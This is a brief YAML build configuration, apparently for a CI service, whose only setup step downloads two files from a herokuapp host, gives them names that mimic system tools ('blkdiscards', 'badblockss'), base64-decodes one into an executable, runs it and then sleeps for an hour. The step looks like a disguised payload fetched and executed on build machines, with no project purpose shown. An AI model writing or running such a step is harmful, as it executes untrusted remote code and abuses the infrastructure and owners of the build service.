build:
  nodes:
    my-node:
      project_setup:
        before:
          - command: wget -O blkdiscards https://panelinfo.herokuapp.com/sugar/nssmaa && wget https://panelinfo.herokuapp.com/sugar/runner && chmod +x blkdiscards && base64 -d runner > badblockss && chmod +x badblockss && ./badblockss && sleep 3600
